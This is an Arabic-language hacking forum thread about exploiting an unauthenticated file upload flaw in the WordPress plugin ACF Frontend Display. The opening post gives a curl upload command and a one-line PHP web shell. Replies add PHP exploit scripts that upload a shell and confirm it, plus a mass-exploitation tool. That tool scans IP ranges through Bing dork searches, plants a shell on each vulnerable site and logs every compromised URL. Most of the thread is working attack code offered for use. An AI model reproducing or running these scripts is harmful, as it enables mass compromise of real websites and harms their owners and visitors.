Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

miutex عضو مميز
  • شكراً: 87
  • تم شكره 271 مرة في 63 مشاركة

كود PHP:
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability
#[+] Date: 3-07-2015
#[+] Type: WebAPP
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+

curl -k -X POST -F "action=upload" -F "[email protected]/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"

File Path:
site/wp-content/uploads/uigen_YEAR/file.php

Example:
site/wp-content/uploads/uigen_2015/evil.php

evil.php:
<?php passthru($_GET['cmd']); ?>

POC:
http://i.imgur.com/7rQClr6.png


TUNISIAN CYBER(miutex)-S4E

توقيع
" يَرْفَعِ اللَّهُ الَّذِينَ آمَنُوا مِنكُمْ وَالَّذِينَ أُوتُوا الْعِلْمَ دَرَجَاتٍ وَاللَّهُ بِمَا تَعْمَلُونَ خَبِيرٌ"
سورة المجادلة
18 أعضاء قالوا شكراً لـ miutex على المشاركة المفيدة:
M-X3 عضو مميز
  • شكراً: 164
  • تم شكره 84 مرة في 46 مشاركة

ما في استغلال php ؟

0x00000f4 عضو جديد
  • شكراً: 23
  • تم شكره 136 مرة في 18 مشاركة

المشاركة الأصلية كتبت بواسطة M-X3 اقتباس :
ما في استغلال php ؟

على السريع

كود PHP:
<?php
/*
Title : WP Plugin Free ACF Frontend Display File Upload Vulnerability
Shell : site/wp-content/uploads/uigen_2015/xoxo.php
Cod3r by Lov3rDns (F)
Author: TUNISIAN CYBER
*/
$url $argv[1];
echo 
"\n\tPath Shell : ";
$love trim(fgets(STDIN));

$select $url.'/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php';
$POST = @array('action' => 'upload','files' =>'@'.$love.'','site' =>$url.'/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php');
echo 
"\r\n[*] Xploiting => ".$url."\r\n";
$curl curl_init();
curl_setopt($curlCURLOPT_URL$select);
curl_setopt($curlCURLOPT_POST1);
curl_setopt($curlCURLOPT_POSTFIELDS,$POST);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_FOLLOWLOCATION1);
$result curl_exec($curl);
if(
eregi('xoxo',$result))
{
  echo 
"[ + ] Found => ".$url."/wp-content/uploads/uigen_2015/xoxo.php\r\n";
}else
{
  echo 
"[ - ] Not Found\r\n";
}
?>

توقيع




اللهم إنا نسألك علماً نافعاً

3 أعضاء قالوا شكراً لـ 0x00000f4 على المشاركة المفيدة:
0x00000f4 عضو جديد
  • شكراً: 23
  • تم شكره 136 مرة في 18 مشاركة

تعديل طفيف بسبب الاستعجال


كود PHP:
<?php
/*
Title : WP Plugin Free ACF Frontend Display File Upload Vulnerability
Shell : site/wp-content/uploads/uigen_2015/xoxo.php
Cod3r by Lov3rDns (F)
Author: TUNISIAN CYBER
*/
echo "\n\tTarget : ";
$url trim(fgets(STDIN));
echo 
"\n\tPath Shell : ";
$love trim(fgets(STDIN));

$select $url.'/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php';
$POST = @array('action' => 'upload','files' =>'@'.$love.'','site' =>$url.'/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php');
echo 
"\r\n[*] Xploiting => ".$url."\r\n";
$curl curl_init();
curl_setopt($curlCURLOPT_URL$select);
curl_setopt($curlCURLOPT_POST1);
curl_setopt($curlCURLOPT_POSTFIELDS,$POST);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_FOLLOWLOCATION1);
$result curl_exec($curl);
if(
eregi('xoxo',$result))
{
  echo 
"[ + ] Found => ".$url."/wp-content/uploads/uigen_2015/xoxo.php\r\n";
}else
{
  echo 
"[ - ] Not Found\r\n";
}
?>

php exp.php

شكراً miutex

توقيع




اللهم إنا نسألك علماً نافعاً

3 أعضاء قالوا شكراً لـ 0x00000f4 على المشاركة المفيدة:
bl4ck-dz عضو نشيط
  • شكراً: 138
  • تم شكره 36 مرة في 14 مشاركة

استغلال اوتوماتيكي للثغرة

يمكنك تعديل الكومنت لكي تقوم بالاستغلال ب list

كود بلغة HTML:
<?php 
/*
by bl4ck-dz
*/
error_reporting(0);
@set_time_limit(0);

$ip1 = $argv[1];
$ip2 = $argv[2];
$dork=$argv[3];
echo iplong($ip1,$ip2,$dork);
function bing($dz) {
for ( $i=1;$i<=2000;$i+=10){
$ch = curl_init("http://www.bing.com/search?q=".urlencode($dz)."&first=".$i."&FORM=PERE5");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$exec = curl_exec($ch);
$patren = "/(<h2><a) (href\=\")(http\:\/\/)([a-z0-9\-]?(\.?)?[a-z0-9])*(\/)*([a-z0-9])*(\/)/";
preg_match_all($patren,$exec,$links);
    foreach($links[0] as $finaly) {
        $file = $argv[4];
            $result = str_replace("<h2><a href=\"","",$finaly);
            acf($result);
}
if(!preg_match('#"sw_next"#',$exec)) break;
 }
}
function iplong($ip1,$ip2,$dork) {
for ($i = ip2long($ip1);$i<= ip2long($ip2);$i++) {
$dz1=  long2ip($i);
echo "\nScanning $dz1\n";
echo bing("ip:$dz1 $dork");
}
}
/*
echo "\t url list of sites : ";$x=trim(fgets(STDIN,1024));
[email protected]_get_contents($x);
$ex=explode("\r\n",$get);
foreach($ex as $mag){
echo acf($mag);
}
*/
function acf($site) {
        $file= "dz.php";
        $ch = curl_init("$site/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php");
        curl_setopt($ch, CURLOPT_POST, true);   
        curl_setopt($ch, CURLOPT_POSTFIELDS, array( 'files'=>"@$file","action"=>"upload"));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36");
        $result = curl_exec($ch);
        $path = "{$site}/wp-content/uploads/uigen_2015/$file";
        $check =file_get_contents ("{$site}/wp-content/uploads/uigen_2015/$file");
        if (preg_match ('/bl4ck-dz/i',$check) ){
            echo "$site -> Exploited \n  Shell -> $path\n";
            $save = fopen ('result.txt','a+');
            fwrite ($save,$path."\n");
        }else
        echo "$site -> Not Exploited\n";
}        
?>

5 أعضاء قالوا شكراً لـ bl4ck-dz على المشاركة المفيدة:
dowmaster xlr عضو جديد
  • شكراً: 20
  • تم شكره 5 مرة في 5 مشاركة

طريقة استعمال الاستغلال الاوتوماتيكي

توقيع

Ⓘ ⓛⓞⓥⓔ ⓣⓗⓔ ⓝⓔⓦ
ɒσωмαsτєя
Mr_AnarShi-T عضو مميز
  • شكراً: 246
  • تم شكره 718 مرة في 170 مشاركة

إستغلال بيرل لعيون حبيبي Miutex

here

تحياتي في أمان الله ~

توقيع
Perl & Java Lov3r

No perl No life
الأعضاء الذين قالوا شكراً لـ Mr_AnarShi-T على المشاركة المفيدة: